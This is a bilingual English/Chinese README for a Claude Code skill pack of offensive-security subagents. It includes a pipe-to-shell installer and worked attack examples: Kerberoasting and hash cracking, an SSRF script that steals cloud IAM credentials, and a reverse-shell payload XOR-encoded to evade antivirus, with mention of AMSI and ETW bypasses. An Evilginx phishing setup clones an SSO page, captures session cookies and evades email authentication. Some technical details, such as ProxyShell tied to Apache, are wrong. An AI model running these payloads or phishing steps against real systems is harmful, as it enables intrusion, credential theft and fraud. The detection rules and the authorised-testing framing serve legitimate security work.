pentest-ai-agents

Compare original and translation side by side

🇺🇸

Original

English

🇨🇳

Translation

Chinese

pentest-ai-agents

Skill by ara.so — Security Skills collection.

pentest-ai-agents transforms Claude Code into an offensive security research assistant through 35 specialized subagents. Each agent carries deep domain knowledge in specific areas: recon, web testing, Active Directory, cloud security, mobile/wireless pentesting, social engineering, payload crafting, reverse engineering, exploit chaining, detection engineering, and forensics.

The agents route automatically based on task description—no manual agent selection needed. They understand 80+ offensive security tools (nmap, nuclei, BloodHound, Impacket, Sliver, Ghidra, etc.) and can plan engagements, analyze recon data, research exploits, chain attacks, build detections, and write reports.

由ara.so开发的技能包——安全技能合集。

pentest-ai-agents 通过35个专业子代理将Claude Code转化为进攻性安全研究助手。每个代理都具备特定领域的深度知识：侦察、Web测试、Active Directory、云安全、移动/无线渗透测试、社会工程、载荷制作、逆向工程、漏洞利用链、检测工程和取证。

代理会根据任务描述自动路由——无需手动选择代理。它们支持80余种进攻性安全工具（nmap、nuclei、BloodHound、Impacket、Sliver、Ghidra等），可规划测试任务、分析侦察数据、研究漏洞利用、构建攻击链、创建检测规则并撰写报告。

Installation

安装

Quick Install (Recommended)

快速安装（推荐）

bash

curl -fsSL https://raw.githubusercontent.com/0xSteph/pentest-ai-agents/main/install.sh | bash

This copies agent files to

~/.claude/agents/

and is idempotent (safe to re-run for updates).

bash

curl -fsSL https://raw.githubusercontent.com/0xSteph/pentest-ai-agents/main/install.sh | bash

该命令会将代理文件复制到

~/.claude/agents/

，且支持幂等操作（可安全重复运行以更新）。

Manual Clone and Install

手动克隆安装

bash

git clone https://github.com/0xSteph/pentest-ai-agents.git
cd pentest-ai-agents

bash

git clone https://github.com/0xSteph/pentest-ai-agents.git
cd pentest-ai-agents

Install agents globally for all projects

为所有项目全局安装代理

./install.sh --global

Or install for current project only

或仅为当前项目安装

./install.sh --project

Use Haiku for advisory agents (lower cost)

为咨询类代理使用Haiku模型（降低成本）

./install.sh --global --lite

Also install underlying CLI tools (nmap, nuclei, ffuf, etc.)

同时安装底层CLI工具（nmap、nuclei、ffuf等）

./install.sh --tools


The `--tools` flag installs underlying offensive security tools via apt/brew/pacman + pipx/go/cargo.

./install.sh --tools


`--tools`参数会通过apt/brew/pacman + pipx/go/cargo安装底层进攻性安全工具。

Installation Modes

安装模式

Flag	Behavior
`--global`	Install to `~/.claude/agents/` (all projects)
`--project`	Install to `.claude/agents/` (current project)
`--lite`	Use Haiku for Tier 1 advisory agents (cost optimization)
`--tools`	Install underlying tools (nmap, nuclei, BloodHound, etc.)

参数	作用
`--global`	安装到 `~/.claude/agents/` （所有项目可用）
`--project`	安装到 `.claude/agents/` （仅当前项目可用）
`--lite`	为Tier 1咨询类代理使用Haiku模型（优化成本）
`--tools`	安装底层工具（nmap、nuclei、BloodHound等）

Agent Architecture

代理架构

Tier 1 vs Tier 2

Tier 1 (Advisory): Analyze data, plan engagements, recommend commands. Never execute tools directly. Examples: engagement-planner, exploit-guide, detection-engineer.
Tier 2 (Execution-capable): Can run tools with user approval and declared scope. Examples: recon-advisor, web-hunter, ad-attacker, payload-crafter.

All Tier 2 agents enforce scope guards—they require explicit engagement scope declaration and refuse out-of-scope actions.

Tier 1（咨询类）：分析数据、规划测试任务、推荐命令。不会直接执行工具。示例：engagement-planner、exploit-guide、detection-engineer。
Tier 2（可执行类）：在用户批准和明确范围下可运行工具。示例：recon-advisor、web-hunter、ad-attacker、payload-crafter。

所有Tier 2代理都有范围防护机制——需要明确声明测试范围，拒绝超出范围的操作。

Agent Categories

代理分类

Planning & OSINT:
  - engagement-planner: Phased pentest plans with MITRE ATT&CK mappings
  - threat-modeler: STRIDE/DREAD threat modeling
  - opsec-anonymizer: Operator identity hygiene, source IP design
  - osint-collector: Domain recon, email harvesting, social profiling
  - recon-advisor: Parses nmap/nuclei/BloodHound, prioritizes targets

Vulnerability Discovery:
  - vuln-scanner: nuclei, nikto, nmap NSE, RouterSploit orchestration
  - web-hunter: ffuf, gobuster, sqlmap, dalfox, Commix
  - api-security: API testing (GraphQL, REST, gRPC)
  - bizlogic-hunter: Business logic flaws, race conditions, IDOR
  - bug-bounty: Bug bounty workflow optimization
  - llm-redteam: OWASP LLM Top 10, prompt injection, RAG poisoning

Infrastructure Attacks:
  - ad-attacker: BloodHound, Impacket, NetExec, Certipy, Kerberos abuse
  - cloud-security: AWS/Azure/GCP misconfig, SCPs, IAM abuse
  - cicd-redteam: Pipeline exploitation, artifact poisoning
  - container-breakout: Docker/K8s escape, runc/cri-o CVEs, RBAC abuse

Specialized Domains:
  - mobile-pentester: Frida, Objection, jadx, MobSF
  - wireless-pentester: aircrack-ng, hcxtools, bettercap
  - social-engineer: Social engineering campaigns
  - phishing-operator: GoPhish, Evilginx, dnstwist

Post-Exploitation:
  - privesc-advisor: Linux/Windows privilege escalation
  - c2-operator: Sliver/Mythic/Havoc/Cobalt Strike profiles
  - payload-crafter: msfvenom, Donut, custom loaders
  - swarm-orchestrator: Multi-agent attack coordination

Analysis & Reverse Engineering:
  - reverse-engineer: Ghidra, Radare2, Binwalk, dnSpy
  - malware-analyst: Volatility 3, YARA, sandbox analysis
  - forensics-analyst: Incident response, memory/disk analysis
  - ctf-solver: CTF challenge solver (crypto, stego, pwn, web)

Exploit Development:
  - exploit-chainer: Multi-step attack composition
  - attack-planner: Attack graph generation, path optimization
  - poc-validator: Exploit proof-of-concept validation
  - credential-tester: Hydra, Hashcat, credential stuffing

Defense & Reporting:
  - detection-engineer: Sigma, Splunk SPL, Elastic KQL, Sentinel KQL
  - stig-analyst: DISA STIG compliance auditing
  - report-generator: Executive summaries, technical findings, CVSS scoring

规划与开源情报（OSINT）:
  - engagement-planner: 带有MITRE ATT&CK映射的分阶段渗透测试计划
  - threat-modeler: STRIDE/DREAD威胁建模
  - opsec-anonymizer: 操作者身份防护、源IP设计
  - osint-collector: 域名侦察、邮箱收集、社交画像
  - recon-advisor: 解析nmap/nuclei/BloodHound结果，优先处理目标

漏洞发现:
  - vuln-scanner: nuclei、nikto、nmap NSE、RouterSploit编排
  - web-hunter: ffuf、gobuster、sqlmap、dalfox、Commix
  - api-security: API测试（GraphQL、REST、gRPC）
  - bizlogic-hunter: 业务逻辑缺陷、竞争条件、IDOR
  - bug-bounty: 漏洞赏金流程优化
  - llm-redteam: OWASP LLM Top 10、提示注入、RAG投毒

基础设施攻击:
  - ad-attacker: BloodHound、Impacket、NetExec、Certipy、Kerberos滥用
  - cloud-security: AWS/Azure/GCP配置错误、SCP、IAM滥用
  - cicd-redteam: 流水线利用、工件投毒
  - container-breakout: Docker/K8s逃逸、runc/cri-o漏洞、RBAC滥用

专业领域:
  - mobile-pentester: Frida、Objection、jadx、MobSF
  - wireless-pentester: aircrack-ng、hcxtools、bettercap
  - social-engineer: 社会工程攻击活动
  - phishing-operator: GoPhish、Evilginx、dnstwist

后渗透阶段:
  - privesc-advisor: Linux/Windows权限提升
  - c2-operator: Sliver/Mythic/Havoc/Cobalt Strike配置文件
  - payload-crafter: msfvenom、Donut、自定义加载器
  - swarm-orchestrator: 多代理攻击协调

分析与逆向工程:
  - reverse-engineer: Ghidra、Radare2、Binwalk、dnSpy
  - malware-analyst: Volatility 3、YARA、沙箱分析
  - forensics-analyst: 事件响应、内存/磁盘分析
  - ctf-solver: CTF挑战求解（密码学、隐写术、二进制漏洞、Web）

漏洞利用开发:
  - exploit-chainer: 多步骤攻击组合
  - attack-planner: 攻击图生成、路径优化
  - poc-validator: 漏洞利用POC验证
  - credential-tester: Hydra、Hashcat、凭证填充

防御与报告:
  - detection-engineer: Sigma、Splunk SPL、Elastic KQL、Sentinel KQL
  - stig-analyst: DISA STIG合规审计
  - report-generator: 执行摘要、技术发现、CVSS评分

Core Commands

核心命令

Interactive Routing

交互式路由

Once installed, just describe your task in Claude Code:

"Plan an internal pentest for a 500-endpoint AD environment, 2-week window."
"I have a domain user, where do I look first in BloodHound?"
"Convert this SharpHound EXE into shellcode for an EDR test."
"Run a phishing simulation against acme-corp.com."
"Reverse this firmware image and analyze the crypto protocol."

Claude routes to the appropriate specialist automatically.

安装完成后，只需在Claude Code中描述你的任务：

"为拥有500个端点的AD环境规划为期2周的内部渗透测试。"
"我有一个域用户，在BloodHound中应该先查看什么？"
"将这个SharpHound EXE转换为shellcode用于EDR测试。"
"针对acme-corp.com进行钓鱼模拟。"
"逆向这个固件镜像并分析加密协议。"

Claude会自动将任务路由到合适的专业代理。

Slash Commands

斜杠命令

bash

undefined

bash

undefined

Get agent recommendation + concrete next commands

获取代理建议及具体后续命令

/recommend "phish a small SaaS team's IT department"

/recommend "针对小型SaaS团队的IT部门进行钓鱼攻击"

Filter agents by domain

按领域筛选代理

/agents-for web /agents-for cloud /agents-for active-directory

List all agents

列出所有代理

/agents

undefined

/agents

undefined

Tool Audit

工具审计

Check which underlying tools are installed:

bash

undefined

检查已安装的底层工具：

bash

undefined

Audit all tools grouped by agent

按代理分组审计所有工具

bash db/doctor.sh

Audit specific agent's toolchain

审计特定代理的工具链

bash db/doctor.sh --agent ad-attacker

Machine-readable output

机器可读输出

bash db/doctor.sh --json


Output shows `✔` (installed) or `✘` (missing) per tool with install hints.

bash db/doctor.sh --json


输出会显示每个工具的`✔`（已安装）或`✘`（缺失）状态，并附带安装提示。

Findings Database

发现数据库

Track engagement findings in persistent SQLite:

bash

undefined

在持久化SQLite中跟踪测试发现：

bash

undefined

Initialize new engagement

初始化新测试任务

bash findings.sh init acme-corp-2026

Add a finding (auto-routed from agent output)

添加发现（从代理输出自动路由）

bash findings.sh add --severity critical --title "Domain Admin in Kerberoastable SPN"
--description "SVC_SQL account has adminCount=1 and servicePrincipalName set"
--cve CVE-2022-12345 --cvss 8.8 --host dc01.acme.local --tool bloodhound

bash findings.sh add --severity critical --title "Domain Admin in Kerberoastable SPN"
--description "SVC_SQL账号adminCount=1且设置了servicePrincipalName"
--cve CVE-2022-12345 --cvss 8.8 --host dc01.acme.local --tool bloodhound

Show engagement stats

查看测试任务统计

bash findings.sh stats

Export findings as JSON

导出发现为JSON格式

bash findings.sh export

Export as Markdown report

导出为Markdown报告

bash findings.sh export --format md


Schema includes `cve`, `tool_used`, `mitre_attack`, `remediation` columns.

bash findings.sh export --format md


数据库模式包含`cve`、`tool_used`、`mitre_attack`、`remediation`字段。

Session Handoffs

会话交接

Generate handoff reports between work sessions:

bash

bash handoff.sh

Produces Markdown with: what was accomplished, current state, immediate next actions, blockers.

生成工作会话之间的交接报告：

bash

bash handoff.sh

生成包含以下内容的Markdown报告：已完成工作、当前状态、紧急后续操作、阻塞点。

Configuration

配置

Environment Variables

环境变量

bash

undefined

bash

undefined

Anthropic API key (required)

Anthropic API密钥（必填）

export ANTHROPIC_API_KEY="sk-ant-..."

Optional: Model overrides

可选：模型覆盖

export PENTEST_TIER1_MODEL="claude-3-5-haiku-20241022" # Advisory agents export PENTEST_TIER2_MODEL="claude-3-7-sonnet-20250219" # Execution agents

export PENTEST_TIER1_MODEL="claude-3-5-haiku-20241022" # 咨询类代理 export PENTEST_TIER2_MODEL="claude-3-7-sonnet-20250219" # 可执行类代理

Optional: Findings database path

可选：发现数据库路径

export PENTEST_FINDINGS_DB="$HOME/.pentest/findings.db"

Optional: Tool installation preferences

可选：工具安装偏好

export PENTEST_PACKAGE_MANAGER="apt" # apt, brew, pacman, yum

undefined

export PENTEST_PACKAGE_MANAGER="apt" # apt、brew、pacman、yum

undefined

Scope Declaration (Tier 2 Agents)

范围声明（Tier 2代理）

Tier 2 agents require explicit scope before executing tools:

bash

undefined

Tier 2代理在执行工具前需要明确声明范围：

bash

undefined

In Claude Code, declare scope first:

在Claude Code中，先声明范围：

"Engagement scope: 10.10.10.0/24, acme-corp.com, authorized by Jane Doe jane@acme.com, 2026-05-01 to 2026-05-15"

"测试范围：10.10.10.0/24，acme-corp.com，由Jane Doe jane@acme.com授权，时间为2026-05-01至2026-05-15"

Then request actions:

然后请求操作：

"Run full port scan on 10.10.10.0/24" "Enumerate SMB shares on discovered hosts"


Agents refuse actions outside declared IP ranges, domains, and time windows.

"对10.10.10.0/24执行全端口扫描" "枚举已发现主机上的SMB共享"


代理会拒绝超出声明的IP范围、域名和时间窗口的操作。

Hard Refusal List

严格拒绝列表

All agents enforce scope guards that refuse:

Denial of Service (DoS/DDoS)
Mass internet scanning
Unattended worm/ransomware propagation
False-flag operations
Safety-of-life system targeting (medical, industrial control)

所有代理都执行范围防护，拒绝以下操作：

拒绝服务攻击（DoS/DDoS）
大规模互联网扫描
无人值守的蠕虫/勒索软件传播
栽赃操作
针对生命安全系统的测试（医疗、工业控制）

Usage Patterns

使用模式

Engagement Planning

测试任务规划

bash

undefined

bash

undefined

In Claude Code:

在Claude Code中：

"Plan a 2-week external pentest for fintech-startup.io. Assume no prior credentials. Focus on web app, API, and cloud infrastructure."


**engagement-planner** produces:
- Phased timeline (recon → initial access → privilege escalation → lateral movement → exfil simulation)
- MITRE ATT&CK technique mappings per phase
- Tool recommendations with time estimates
- ROE template with emergency contacts

"为fintech-startup.io规划为期2周的外部渗透测试。假设无初始凭证。重点关注Web应用、API和云基础设施。"


**engagement-planner**会生成：
- 分阶段时间线（侦察→初始访问→权限提升→横向移动→数据泄露模拟）
- 每个阶段的MITRE ATT&CK技术映射
- 带时间预估的工具建议
- 包含紧急联系人的ROE模板

Recon and Target Prioritization

侦察与目标优先级

bash

undefined

bash

undefined

Run recon tools (outside Claude):

运行侦察工具（在Claude外部）：

nmap -sV -sC -oA acme-scan 10.10.10.0/24 nuclei -l hosts.txt -severity critical,high -json -o nuclei.json

In Claude Code:

在Claude Code中：

"Analyze acme-scan.xml and nuclei.json. Prioritize targets for initial access."


**recon-advisor** (Tier 2):
1. Parses XML/JSON
2. Groups findings by host and severity
3. Recommends attack paths (e.g., "10.10.10.50: outdated Apache + ProxyShell CVE")
4. Suggests next commands: `ffuf -u http://10.10.10.50/FUZZ -w /usr/share/wordlists/dirb/common.txt`

"分析acme-scan.xml和nuclei.json。优先选择初始访问的目标。"


**recon-advisor**（Tier 2）：
1. 解析XML/JSON
2. 按主机和严重程度分组发现结果
3. 推荐攻击路径（例如："10.10.10.50：过时的Apache + ProxyShell漏洞"）
4. 建议后续命令：`ffuf -u http://10.10.10.50/FUZZ -w /usr/share/wordlists/dirb/common.txt`

Active Directory Attack Chains

Active Directory攻击链

bash

undefined

bash

undefined

After obtaining BloodHound JSON:

获取BloodHound JSON后：

"I have domain user alice@acme.local. BloodHound data is in ./bloodhound/. Show me paths to Domain Admins and recommend attacks."


**ad-attacker**:
- Runs `bloodhound-python` or parses existing JSON
- Identifies: Kerberoastable accounts, AS-REP roastable users, constrained delegation, ACL abuse paths
- Generates command sequences:
  ```bash
  GetUserSPNs.py acme.local/alice:password -dc-ip 10.10.10.5 -request -outputfile spns.txt
  hashcat -m 13100 spns.txt /usr/share/wordlists/rockyou.txt

"我有域用户alice@acme.local。BloodHound数据在./bloodhound/中。展示通往Domain Admins的路径并推荐攻击方法。"


**ad-attacker**：
- 运行`bloodhound-python`或解析现有JSON
- 识别：可Kerberoast的账号、可AS-REP roast的用户、约束委派、ACL滥用路径
- 生成命令序列：
  ```bash
  GetUserSPNs.py acme.local/alice:password -dc-ip 10.10.10.5 -request -outputfile spns.txt
  hashcat -m 13100 spns.txt /usr/share/wordlists/rockyou.txt

Exploit Chaining

漏洞利用链

bash

"I found SSRF in the /admin/debug endpoint and read /etc/passwd. Next steps to get a shell?"

exploit-chainer:

Validates SSRF → file read primitive
Recommends: SSRF → internal service enumeration → cloud metadata (if AWS/Azure/GCP)
Chains: SSRF to 169.254.169.254 → IAM role credentials → S3 bucket access → RCE via Lambda

Provides POC code:

python

import requests
url = "https://target.com/admin/debug?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/"
roles = requests.get(url).text.split('\n')
creds = requests.get(f"{url}{roles[0]}").json()
print(creds['AccessKeyId'], creds['SecretAccessKey'], creds['Token'])

bash

"我在/admin/debug端点发现了SSRF并读取了/etc/passwd。下一步如何获取shell？"

exploit-chainer：

验证SSRF→文件读取权限
推荐：SSRF→内部服务枚举→云元数据（如果是AWS/Azure/GCP）
构建攻击链：SSRF到169.254.169.254→IAM角色凭证→S3存储桶访问→通过Lambda实现RCE

提供POC代码：

python

import requests
url = "https://target.com/admin/debug?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/"
roles = requests.get(url).text.split('\n')
creds = requests.get(f"{url}{roles[0]}").json()
print(creds['AccessKeyId'], creds['SecretAccessKey'], creds['Token'])

Payload Crafting and Evasion

载荷制作与规避

bash

"Generate a Windows reverse shell payload for 10.10.10.50:443, encode it to evade AV, and convert to shellcode for process injection."

payload-crafter:

bash

undefined

bash

"生成一个指向10.10.10.50:443的Windows反向shell载荷，编码以规避AV，并转换为shellcode用于进程注入。"

payload-crafter：

bash

undefined

Stage 1: Generate payload

阶段1：生成载荷

msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.10.10.50 LPORT=443 -f exe -o payload.exe

Stage 2: Convert to shellcode with Donut

阶段2：用Donut转换为shellcode

donut -a 2 -f 1 payload.exe -o payload.bin

Stage 3: Encode shellcode (XOR + base64)

阶段3：编码shellcode（XOR + base64）

python3 << 'EOF' with open('payload.bin', 'rb') as f: sc = f.read() xor_sc = bytes([b ^ 0xAA for b in sc]) import base64 print(base64.b64encode(xor_sc).decode()) EOF

Stage 4: Inject via process hollowing (C# template provided)

阶段4：通过进程空心化注入（提供C#模板）


Includes AMSI bypass snippets and ETW patching patterns.


包含AMSI绕过代码片段和ETW补丁模式。

Detection Engineering

检测工程

bash

"We just tested Kerberoasting against SVC_SQL. Build Sigma and Splunk detection rules."

detection-engineer:

yaml

undefined

bash

"我们刚刚针对SVC_SQL测试了Kerberoasting。构建Sigma和Splunk检测规则。"

detection-engineer：

yaml

undefined

Sigma rule (kerberoasting.yml)

Sigma规则（kerberoasting.yml）

title: Kerberoasting TGS Request status: experimental logsource: product: windows service: security detection: selection: EventID: 4769 TicketOptions: '0x40810000' ServiceName|endswith: '$' filter: ServiceName|startswith: 'krbtgt' condition: selection and not filter falsepositives:

Legitimate service account access level: medium tags:
attack.credential_access
attack.t1558.003


```spl

Legitimate service account access level: medium tags:
attack.credential_access
attack.t1558.003


```spl

Splunk SPL

index=windows EventCode=4769 Ticket_Options=0x40810000 Service_Name=$ NOT Service_Name=krbtgt | stats count by src_ip, Account_Name, Service_Name | where count > 5

undefined

index=windows EventCode=4769 Ticket_Options=0x40810000 Service_Name=$ NOT Service_Name=krbtgt | stats count by src_ip, Account_Name, Service_Name | where count > 5

undefined

Reverse Engineering Firmware

固件逆向工程

bash

"Analyze router-firmware.bin and extract the encryption keys."

reverse-engineer:

bash

undefined

bash

"分析router-firmware.bin并提取加密密钥。"

reverse-engineer：

bash

undefined

Extract filesystem

提取文件系统

binwalk -e router-firmware.bin

Identify architecture

识别架构

file _router-firmware.bin.extracted/squashfs-root/bin/httpd

Output: ELF 32-bit LSB MIPS

输出：ELF 32-bit LSB MIPS

Load into Ghidra (headless mode)

加载到Ghidra（无头模式）

analyzeHeadless /tmp/ghidra_project router_fw -import _router-firmware.bin.extracted/squashfs-root/bin/httpd -postScript FindCryptoKeys.java

Search for hardcoded keys

搜索硬编码密钥

strings -n 16 httpd | grep -E '^[A-Fa-f0-9]{32,}$'


Provides Ghidra Python scripts for automated key extraction from common crypto libraries (OpenSSL, mbedTLS).

strings -n 16 httpd | grep -E '^[A-Fa-f0-9]{32,}$'


提供用于从常见加密库（OpenSSL、mbedTLS）自动提取密钥的Ghidra Python脚本。

Phishing Campaign Setup

钓鱼攻击活动设置

bash

"Set up a phishing campaign for acme-corp.com employees. Clone their SSO login page and capture credentials with session cookies."

phishing-operator:

bash

undefined

bash

"为acme-corp.com员工设置钓鱼攻击活动。克隆他们的SSO登录页面并捕获带会话Cookie的凭证。"

phishing-operator：

bash

undefined

1. Register lookalike domain

1. 注册相似域名

Manual: acme-sso.com (or use dnstwist suggestions)

手动操作：acme-sso.com（或使用dnstwist建议）

dnstwist acme-corp.com --registered | head -10

2. Clone SSO page

2. 克隆SSO页面

wget --mirror --convert-links --adjust-extension --page-requisites --no-parent https://sso.acme-corp.com/login

3. Deploy Evilginx

3. 部署Evilginx

evilginx2 -p ./phishlets

Configure phishlet for acme-corp SSO (example phishlet config provided)

为acme-corp SSO配置钓鱼模板（提供示例钓鱼模板配置）

4. Track campaign in GoPhish

4. 在GoPhish中跟踪活动

Import targets, attach cloned template, set sending profile

导入目标、附加克隆模板、设置发送配置


Includes SMTP relay setup, domain reputation warming, and email header crafting to evade SPF/DKIM/DMARC.


包含SMTP中继设置、域名信誉提升和邮件头制作，以规避SPF/DKIM/DMARC。

CTF Challenges

CTF挑战

bash

"Solve this CTF crypto challenge: ciphertext is 'Xq3mK9...' and we have a PCAP with TLS handshake."

ctf-solver:

Identifies cipher type (frequency analysis suggests substitution)
Tries automated solvers:
```
dcode.fr substitution
```
,
```
quipqiup
```
Extracts TLS pre-master secret from PCAP via Wireshark

Decrypts TLS stream:

bash

tshark -r capture.pcap -o tls.keylog_file:sslkeylog.txt -Y http -T fields -e http.file_data

Covers crypto, steganography (zsteg, steghide), forensics, binary exploitation, web challenges.

bash

"解决这个CTF密码学挑战：密文是'Xq3mK9...'，我们有包含TLS握手的PCAP文件。"

ctf-solver：

识别密码类型（频率分析表明是替换密码）
尝试自动求解器：
```
dcode.fr substitution
```
、
```
quipqiup
```
通过Wireshark从PCAP中提取TLS预主密钥

解密TLS流：

bash

tshark -r capture.pcap -o tls.keylog_file:sslkeylog.txt -Y http -T fields -e http.file_data

覆盖密码学、隐写术（zsteg、steghide）、取证、二进制漏洞、Web挑战。

Underlying Tools

底层工具

Agents drive these tools (installable via

install.sh --tools

Recon: nmap, masscan, rustscan, subfinder, amass, httpx, theHarvester, sherlock, holehe, maigret
Web: ffuf, gobuster, feroxbuster, sqlmap, dalfox, Commix, dirsearch, whatweb
Vulnerability: nuclei, nikto, nmap NSE, RouterSploit
AD: BloodHound, Impacket, NetExec, Certipy, kerbrute, Responder
Credentials: Hydra, Hashcat, John, cupp, CeWL, Crunch, hashid, haiti
Cloud: aws-cli, azure-cli, gcloud, Trivy, Prowler, ScoutSuite, Pacu
Containers: kubectl, kube-hunter, peirates, CDK
C2: Sliver, Mythic, Havoc, Cobalt Strike
LLM: Garak, PyRIT, Promptfoo
Mobile: Frida, Objection, jadx, apktool, MobSF
Wireless: aircrack-ng, hcxdumptool, bettercap
Social: GoPhish, Evilginx, dnstwist
Payloads: msfvenom, Donut
RE: Ghidra, Radare2, Binwalk, dnSpy
Forensics: Volatility 3, exiftool, YARA, Wireshark

Run

bash db/doctor.sh

to audit installed tools.

代理驱动以下工具（可通过

install.sh --tools

安装）：

侦察：nmap、masscan、rustscan、subfinder、amass、httpx、theHarvester、sherlock、holehe、maigret
Web：ffuf、gobuster、feroxbuster、sqlmap、dalfox、Commix、dirsearch、whatweb
漏洞：nuclei、nikto、nmap NSE、RouterSploit
AD：BloodHound、Impacket、NetExec、Certipy、kerbrute、Responder
凭证：Hydra、Hashcat、John、cupp、CeWL、Crunch、hashid、haiti
云：aws-cli、azure-cli、gcloud、Trivy、Prowler、ScoutSuite、Pacu
容器：kubectl、kube-hunter、peirates、CDK
C2：Sliver、Mythic、Havoc、Cobalt Strike
LLM：Garak、PyRIT、Promptfoo
移动：Frida、Objection、jadx、apktool、MobSF
无线：aircrack-ng、hcxdumptool、bettercap
社会工程：GoPhish、Evilginx、dnstwist
载荷：msfvenom、Donut
逆向工程：Ghidra、Radare2、Binwalk、dnSpy
取证：Volatility 3、exiftool、YARA、Wireshark

运行

bash db/doctor.sh

审计已安装工具。

Token Optimization

令牌优化

Model Selection

模型选择

bash

undefined

bash

undefined

Use Haiku for advisory agents (engagement-planner, exploit-guide, detection-engineer)

为咨询类代理使用Haiku模型（engagement-planner、exploit-guide、detection-engineer）

./install.sh --global --lite

Or set manually:

或手动设置：

export PENTEST_TIER1_MODEL="claude-3-5-haiku-20241022" export PENTEST_TIER2_MODEL="claude-3-7-sonnet-20250219"


**Cost comparison** (per 1M tokens input):
- Haiku: $0.80
- Sonnet: $3.00

Tier 1 agents handle ~80% of interactions (planning, analysis, recommendations). Using Haiku for Tier 1 cuts costs by ~60% with minimal quality impact.

export PENTEST_TIER1_MODEL="claude-3-5-haiku-20241022" export PENTEST_TIER2_MODEL="claude-3-7-sonnet-20250219"


**成本对比**（每100万输入令牌）：
- Haiku：$0.80
- Sonnet：$3.00

Tier 1代理处理约80%的交互（规划、分析、建议）。为Tier 1使用Haiku模型可降低约60%的成本，且对质量影响极小。

Context Management

上下文管理

Agents use structured tool output parsing to minimize repeated context:

bash

undefined

代理使用结构化工具输出解析来减少重复上下文：

bash

undefined

Instead of pasting full nmap XML into chat:

无需将完整的nmap XML粘贴到聊天中：

findings.sh import --file acme-scan.xml

Agent queries SQLite directly:

代理直接查询SQLite：

SELECT host, port, service, version FROM scan_results WHERE severity='critical';


Reduces token usage by 10-50× for large scan outputs.

SELECT host, port, service, version FROM scan_results WHERE severity='critical';


对于大型扫描输出，可将令牌使用量减少10-50倍。

Local Models (Experimental)

本地模型（实验性）

Run agents with local models via Ollama:

bash

undefined

通过Ollama运行本地模型：

bash

undefined

Install Ollama

安装Ollama

curl -fsSL https://ollama.com/install.sh | sh

Pull model

拉取模型

ollama pull mixtral:8x7b

Configure pentest-ai-agents

配置pentest-ai-agents

export PENTEST_LOCAL_MODEL="mixtral:8x7b" export ANTHROPIC_API_KEY="" # Disable cloud models


**Tested models**:
- `mixtral:8x7b`: Good for Tier 1 advisory agents
- `llama3:70b`: Comparable to Haiku for planning/analysis
- `codellama:34b`: Decent for exploit POC generation

**Limitations**: Local models struggle with complex exploit chaining and detection rule generation. Recommend hybrid mode: local for Tier 1, Claude Sonnet for Tier 2.

export PENTEST_LOCAL_MODEL="mixtral:8x7b" export ANTHROPIC_API_KEY="" # 禁用云端模型


**已测试模型**：
- `mixtral:8x7b`：适用于Tier 1咨询类代理
- `llama3:70b`：在规划/分析方面可与Haiku媲美
- `codellama:34b`：在漏洞利用POC生成方面表现尚可

**局限性**：本地模型在复杂漏洞利用链和检测规则生成方面表现不佳。推荐混合模式：Tier 1使用本地模型，Tier 2使用Claude Sonnet。

Troubleshooting

故障排除

Agent Not Routing

代理未路由

Symptom: Claude doesn't invoke the right agent for your task.

Fix: Be more explicit in task description:

bash

undefined

症状：Claude未为你的任务调用正确的代理。

解决方法：在任务描述中更明确：

bash

undefined

Vague

模糊描述

"Help with Active Directory"

"帮助处理Active Directory"

Specific

明确描述

"I have a domain user. Analyze BloodHound data and recommend Kerberoasting attacks."


Or use slash commands:
```bash
/recommend "domain user to domain admin in AD environment"

"我有一个域用户。分析BloodHound数据并推荐Kerberoasting攻击。"


或使用斜杠命令：
```bash
/recommend "在AD环境中从域用户到域管理员"

Tools Not Found

工具未找到

Symptom: Agent recommends command, but tool isn't installed.

Fix:

bash

undefined

症状：代理推荐了命令，但工具未安装。

解决方法：

bash

undefined

Audit missing tools

审计缺失的工具

bash db/doctor.sh

Install missing tools

安装缺失的工具

./install.sh --tools

Or install specific tool manually:

或手动安装特定工具：

sudo apt install nmap pipx install bloodhound

undefined

sudo apt install nmap pipx install bloodhound

undefined

Scope Refusal

范围拒绝

Symptom: Tier 2 agent refuses to run commands: "No engagement scope declared."

Fix: Declare scope first:

bash

"Engagement scope: 10.10.10.0/24, testlab.local, authorized by Alice <alice@example.com>, 2026-05-01 to 2026-05-31"

Include: IP ranges, domains, authorizing party, time window.

症状：Tier 2代理拒绝运行命令："未声明测试范围。"

解决方法：先声明范围：

bash

"测试范围：10.10.10.0/24，testlab.local，由Alice <alice@example.com>授权，时间为2026-05-01至2026-05-31"

包含：IP范围、域名、授权方、时间窗口。

Findings Database Locked

发现数据库锁定

Symptom:

database is locked

error when adding findings.

Fix:

bash

undefined

症状：添加发现时出现

database is locked

错误。

解决方法：

bash

undefined

Close any open findings.sh processes

关闭所有打开的findings.sh进程

pkill -f findings.sh

Or use WAL mode (write-ahead logging):

或使用WAL模式（预写日志）：

sqlite3 ~/.pentest/findings.db "PRAGMA journal_mode=WAL;"

undefined

sqlite3 ~/.pentest/findings.db "PRAGMA journal_mode=WAL;"

undefined

Out-of-Date Agent Knowledge

代理知识过时

Symptom: Agent recommends deprecated tool or technique.

Fix: Update agents:

bash

cd pentest-ai-agents
git pull
./install.sh --global

Agents track tool updates via community feedback. File issues for outdated recommendations.

症状：代理推荐了已弃用的工具或技术。

解决方法：更新代理：

bash

cd pentest-ai-agents
git pull
./install.sh --global

代理通过社区反馈跟踪工具更新。对于过时的建议，请提交Issue。

Real-World Examples

实际案例

Example 1: Full External Pentest Workflow

案例1：完整外部渗透测试流程

bash

undefined

bash

undefined

Step 1: Plan engagement

步骤1：规划测试任务

In Claude Code:

在Claude Code中：

"Plan a 2-week external pentest for acme-corp.com. No credentials. Focus on web, API, cloud."

"为acme-corp.com规划为期2周的外部渗透测试。无初始凭证。重点关注Web、API和云。"

engagement-planner produces timeline, ROE, tool list

engagement-planner生成时间线、ROE、工具列表

Step 2: OSINT recon

步骤2：OSINT侦察

"Run OSINT on acme-corp.com. Find subdomains, employee emails, leaked credentials."

"对acme-corp.com执行OSINT侦察。查找子域名、员工邮箱、泄露的凭证。"

osint-collector executes:

osint-collector执行：

subfinder -d acme-corp.com -o subs.txt amass enum -d acme-corp.com -o amass.txt theHarvester -d acme-corp.com -b all -f harvest.json

Searches breach databases (dehashed, etc.)

搜索泄露数据库（dehashed等）

Step 3: Vulnerability scanning

步骤3：漏洞扫描

"Scan discovered hosts with nuclei for critical/high severity issues."

"用nuclei扫描已发现的主机，查找严重/高危漏洞。"

vuln-scanner:
